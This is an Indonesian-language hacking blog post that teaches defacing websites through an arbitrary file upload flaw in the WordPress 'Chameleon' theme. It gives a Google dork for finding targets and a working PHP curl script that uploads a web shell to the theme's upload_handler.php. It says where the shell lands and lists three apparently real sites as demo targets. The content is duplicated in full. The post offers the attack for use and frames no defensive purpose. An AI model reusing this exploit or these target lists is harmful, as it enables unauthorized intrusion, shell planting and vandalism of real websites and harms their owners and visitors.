Satality32 - ./ halow om , ketemu lg sama saya om kali ini saya ingin berbagi ke om tentang Teknik Deface dengan cara "exploit WordPress Chameleon theme"
Teknik ini di shared oleh DaOne aka MockingBird di 1337day.com (mirror) oke langsung ajh ea om
Google dork: inurl:/wp-content/themes/cameleon/
# Exploit
<?php
$uploadfile="yourfile.php";
$ch = curl_init("http://{Target}/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Lokasi HasilUpload shell bisa di cek di http://[target]/wp-content/uploads/2013/11/{filename}.php
Demo Site :
Demo sites
http://mirrorimagecounseling.org/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
http://sakpasemedia.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
http://www.818420.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
Teknik ini di shared oleh DaOne aka MockingBird di 1337day.com (mirror) oke langsung ajh ea om
Google dork: inurl:/wp-content/themes/cameleon/
# Exploit
<?php
$uploadfile="yourfile.php";
$ch = curl_init("http://{Target}/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Lokasi HasilUpload shell bisa di cek di http://[target]/wp-content/uploads/2013/11/{filename}.php
Demo Site :
Demo sites
http://mirrorimagecounseling.org/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
http://sakpasemedia.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
http://www.818420.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
2 comments:
tutorialnya dari awal gimana om, maklum newbie :D
coba om langsung ke mirror saja :)
Post a Comment
Silahkan Om Tinggalkan jejak di blog ini | Semua Orang dapat berkomentar di Blog ini dan Bila Om tidak punya akun Gmail / OpenID , om dapat mengunakan Fitur Tanpa Nama , jadi Om bisa berkomentar di blog ini , tp ingat om komentarnya jangan Gunakan bahasa kasar / jorok , karena blog ini di baca di seluruh dunia
==>> Komentar Mu adalah Harimau mu <<==